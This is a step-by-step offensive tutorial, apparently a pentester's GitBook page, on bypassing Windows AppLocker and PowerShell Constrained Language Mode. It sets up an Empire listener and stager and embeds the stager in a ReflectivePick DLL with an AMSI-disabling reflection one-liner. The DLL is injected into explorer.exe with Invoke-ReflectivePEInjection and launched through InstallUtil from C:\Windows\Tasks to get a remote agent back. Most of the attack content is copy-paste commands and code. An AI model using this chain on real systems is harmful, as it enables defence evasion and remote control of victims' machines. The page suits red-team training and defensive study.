# Bypassing Applocker and Powershell contstrained language mode ## Using Reflective Injection and Certutil This technique involves packing everything together several times to bypass all the security mechanisms. I based this on the [awesome article ](https://improsec.com/blog/babushka-dolls-or-how-to-bypass-application-whitelisting-and-constrained-powershell)from Improsec called "Babushka dolls" and elements from it's Github project. **Edit: Sadly after Windows 10 1803 and onwards this trick doesn't work for bypassing AMSI any longer. AMSI now uses a scanbuffer instead of scanstring which was previously used.** ### Generating listener and stager in Empire Set up a listener and generate a stager. I've put all the commands below for easy copypaste. ``` ./Empire listeners uselistener set Host 10.0.0.15 set Port 80 execute back usestager multi/launcher set Listener http generate ``` ![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODYsRyEN-bemyeF_3-%2F-LOD_3E5oZbBiam86Usz%2Fimage.png?alt=media\&token=b3f1e824-0401-4ead-a5fc-009f611cc462) ![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODYsRyEN-bemyeF_3-%2F-LOD_FcPV9CfcXV1Ysrf%2Fimage.png?alt=media\&token=a682532b-ede1-4048-9ca4-7564389baf59) ### ReflectivePick with Visual Studio We are now going to write the stager we generated into the ReflectivePick project. Open the [PowerPick project ](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick/ReflectivePick)in VS. It may be necessary to set the target to x64. Project -> ReflectivePick properties -> Configuration Manager -> Platform ![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODYsRyEN-bemyeF_3-%2F-LOD_liPhVHEZeggXmID%2Fimage.png?alt=media\&token=17b0d04b-5fef-48bb-8629-cbf47b94627c) Add the base64 from the stager where appropriate. ![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODYsRyEN-bemyeF_3-%2F-LODcGVNblBIAxcrDenT%2Fimage.png?alt=media\&token=b0c3fd21-4d53-443b-8e25-f0a8c957bb4f) `wchar_t* argument = L"[Ref].Assembly.GetType('System.Management.Automation.sAmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);$encoded = \"BASE64STRING\";$decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded));$decoded | Out-File -FilePath C:\Windows\Tasks\out.txt;IEX $decoded"; //Output debug` This includes an output write for demonstration purposes. You can remove it if you desire. Compile the dll to `ReflectivePick_x64.dll` ![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODeeknJ7aRAiZEBt9A%2F-LODf-HZXVW3eFGYl_fP%2Fimage.png?alt=media\&token=4db67446-272a-4e28-a7f4-22c26a636808) ### Execution We can now try to run the dll with `rundll32.exe .\ReflectivePick_x64.dll,Void` but as you will soon discover, AMSI picks up the Empire stager during runtime. ![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODYsRyEN-bemyeF_3-%2F-LODZ1XSgrRpZIF06LAN%2Fimage.png?alt=media\&token=99946f4c-f5c9-4087-84da-7ab098800a4c) Disable AMSI however, and you get an agent back. ![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODYsRyEN-bemyeF_3-%2F-LODe9pxMld_vegJdkV2%2Fimage.png?alt=media\&token=87e58a21-90cb-459d-a6ef-e8a603f085ce) You can also view the base64-decoded stager payload in `c:\windows\tasks\out.txt` ![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODYsRyEN-bemyeF_3-%2F-LODePJSbSFDjIoupDUL%2Fimage.png?alt=media\&token=2788e2ca-beb0-48aa-a14d-ef4264aaf834) We can't rely on manually disabling AMSI, so we are going to run it through a few more hoops. ### Load the DLL into another process To avoid creating a new process and loading the non-whitelisted DLL we are going to reflectively inject it into a process using [Invoke-ReflectiveInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1). Use the following commands in PS to encode the DLL to base64 and pipe the results to a file. Don't worry if the commands take a few seconds to run. I have also noticed that Powershell adds a newline at the bottom of the file when Base64-encoding like this so manually remove that if it is present. ``` $Content = Get-Content .\ReflectivePick_x64.dll -Encoding Byte $Encoded = [System.Convert]::ToBase64String($Content) $Encoded | Out-File "C:\users\chris\Desktop\PowerTools-master\PowerPick\bin\x64\Debug\dll.txt" ``` ![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODgq2h6Ef6q8Wbv8ir%2F-LODhGGB3nJcqsyrJmmW%2Fimage.png?alt=media\&token=3497bc51-c2d2-415e-8f0d-3881f42ec645) Now you want to download [Invoke-ReflectivePEInjection](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1) to the working directory and open it in a text editor. At the bottom of the file, add the following lines, where we copypaste the contents of `dll.txt` to the `$dllData` object. This will ensure the dll is reflectively injected into the `explorer.exe` process during runtime. ``` $dllData = "DLLBASE64_GOES_HERE" $ProcId = (Get-Process explorer).Id $Bytes = [System.Convert]::FromBase64String($dllData) Invoke-ReflectivePEInjection -PEBytes $Bytes -ProcId $ProcId ``` ![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LOEFF_bq46ZMZR-vgVT%2F-LOEFcB-T-DY2VNgVNmI%2Fimage.png?alt=media\&token=39509298-a33c-4444-aacc-e54ddc6feb8c) ### Compile to an EXE using VS In powershell, base64 encode the entire script. Remove the newline at the bottom of the output file if present. ``` $Content = Get-Content .\Invoke-ReflectivePEInjection.ps1 -Encoding Byte $Encoded = [System.Convert]::ToBase64String($Content) $Encoded | Out-File "C:\users\chris\Desktop\PowerTools-master\PowerPick\bin\x64\Debug\pe.txt" ``` ![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODgq2h6Ef6q8Wbv8ir%2F-LODkjnLAmWMt8VGDQ_f%2Fimage.png?alt=media\&token=1bcc07d8-7d55-4cbe-94b2-affc6349ed13) Open the [Bypass project](https://github.com/MortenSchenk/Babuska-Dolls/tree/master/Bypass) in VS and copypaste the base64 into the encoded variable. Compile to `Bypass.exe` with VS. ![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LOEFF_bq46ZMZR-vgVT%2F-LOEFShMYmaq_sUFqaaS%2Fimage.png?alt=media\&token=9030e5dc-3181-495f-b310-33be56a75ec5) ### Final execution Use `installutil.exe` or similar [LOLbBns ](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LOLBins.md)to execute `Bypass.exe`. If Applocker is present, execute it from a whitelisted directory such as `C:\Windows\Tasks` ``` C:\windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\Bypass.exe ``` ![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODvHqU2TrAlgHAS47m%2F-LOEE91ztrMVlzoHbpq-%2Fimage.png?alt=media\&token=5b8e1059-c308-4d9d-a202-9d76d46be9fe) ![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODvHqU2TrAlgHAS47m%2F-LOEEH5P2ObycOZP5-cM%2Fimage.png?alt=media\&token=bd00293e-00cc-4a8b-924a-cc9096621bf5) Thrilling! We bypassed both Applocker and Powershell constrained language mode and got an Empire agent back.